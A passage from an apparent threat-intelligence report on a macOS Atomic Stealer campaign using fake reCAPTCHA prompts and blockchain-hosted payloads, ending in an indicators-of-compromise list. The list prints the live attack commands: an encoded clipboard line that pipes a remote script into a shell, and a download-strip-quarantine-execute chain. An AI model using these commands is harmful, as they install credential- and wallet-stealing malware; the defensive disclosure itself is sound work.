      • Capability-to-Adversary: Reflects the adversary’s expertise in macOS malware and blockchain integration.
  • Victimology:
    • Description: macOS users accessing compromised websites, from individuals to organizations using macOS for personal or professional tasks.
    • Attributes: Targeted for sensitive data (Keychain credentials, wallets, browser data) and system information, with no specific industry focus, suggesting opportunistic attacks.
    • Edges:
      • Victim-to-Adversary: Provides valuable data for resale or exploitation, driving the adversary’s objectives.
      • Victim-to-Infrastructure: Interacts with compromised websites, triggering ClickFix/ClearFix and EtherHiding payloads.
      • Victim-to-Capability: Vulnerable to social engineering and macOS-specific exploits, enabling command execution and data theft.

Analysis: The Diamond Model highlights the adversary’s reliance on a resilient, decentralized infrastructure (Binance Smart Contracts, compromised sites) and sophisticated capabilities, not only to deliver using (ClickFix/ClearFix, EtherHiding) to target macOS users opportunistically but also on the way it obfuscates and hides the compromise. The adversary-to-infrastructure edge is critical, with EtherHiding making it a persistent command delivery, while the capability-to-victim edge exploits user trust. Defenders should disrupt infrastructure (e.g., block domains) and enhance user awareness to break these connections.

Conclusion: A Call to Strengthen macOS Defenses

By doing this investigation, which started by a compromised Brazilian news site, has peeled back the layers of a massive campaign targeting macOS users with Atomic Stealer. The attackers’ use of ClickFix/ClearFix fake reCAPTCHAs and EtherHiding via Binance Smart Contracts showcases a blend of social engineering and technical finesse that challenges conventional defenses. With ~2,800 potentially compromised websites identified, this operation shows the growing threat to macOS environments. My gratitude goes to Censys and Onyphe for providing the research data that made this discovery possible. As an independent researcher, I urge macOS users and defenders to act on these findings, and implement the recommended mitigations. The battle against cybercrime is relentless, but every step toward awareness and resilience makes a difference.



Indicators of Compromise (IOCs)

  1. Domains:
    • technavix[.]cloud: Probable C2 (initial checker of platform) (/popup, /copy endpoints).
    • salorttactical[.]top: Payload host (/2/verify.sh, /update).
    • Not inheretly malicious, but worth looking for in enterprise environements: bsc-dataseed.binance.org.
  2. Smart Contract Addresses:
    • 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA: Delivers jadeCode.
    • 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53: Delivers decompressedScript.

      Full list of BSC Contracts:
      0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53
      0xa6165aa33ac710ad5dcd4f4d6379466825476fde
      0x8FBA1667BEF5EdA433928b220886A830488549BD
      0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA
  3. Commands:
    • Clipboard: echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cHM6Ly9zYWxvcnR0YWN0aWNhbC50b3AvMi92ZXJpZnkuc2gpIg==' | base64 -D | sh
    • Second-Stage: curl -o /tmp/update https://salorttactical[.]top/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
  4. Binary Hash: VT 9efddeb9e09eef067c3d2d307f38371ba0baf4c8fceaba01b9f007a50350a55c
  5. Binary UUID: e8633716-8673-317e-bcd4-2616e5956cef
  6. Console Logs: “Start moving...”, “Moved.”, “Road unavaible:”
  7. Behavioral Indicators:
    • ClickFix/ClearFix fake reCAPTCHA with macOS-specific shortcuts (⌘ + Space, ⌘ + V).
    • Clipboard manipulation via copyToClipboard().
    • Full-screen iframes with high z-index (2147483647).
  8. External Resources:
    • https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js
    • https://use.fontawesome.com/releases/v5.0.0/css/all.css
    • https://upload.wikimedia.org/wikipedia/commons/thumb/8/83/ReCAPTCHA_icon.svg/220px-ReCAPTCHA_icon.svg.png
  9. List of Potentially Compromised Sites ~2800 (I verified around 500 of them, I have high confidence almost all may be or have been compromised by what has been described on this article, but needs double checking):
pontopositivosc[.]com
test.enigmait[.]co
tigrus[.]us
lescourtoises[.]fr
multicopi.com[.]br
assiaspose[.]it
www.esqbusiness[.]net
www.zbo.bwk.mybluehost[.]me
ggcafe.eezitek[.]com
longomgmt[.]co
gonilehealth[.]com
marcelacihlarova[.]cz
3tagenciadenegocios.com[.]br

....

Find more on: Host-list


OPERATIONAL UPDATE:

As of May 7th:

Adversary Disruption Update:

1: technavix[.]cloud, salorttactical[.]top are no longer resolving.

2: TA has stopped delivering ClickFix (for now) for both Windows and Mac.

3: Binance transactions are still happening in the background for almost all compromised sites so there is a chance of infrastructure rotation.

4: nc1.overallwobbly[.]ru is still operational (Windows payload delivery)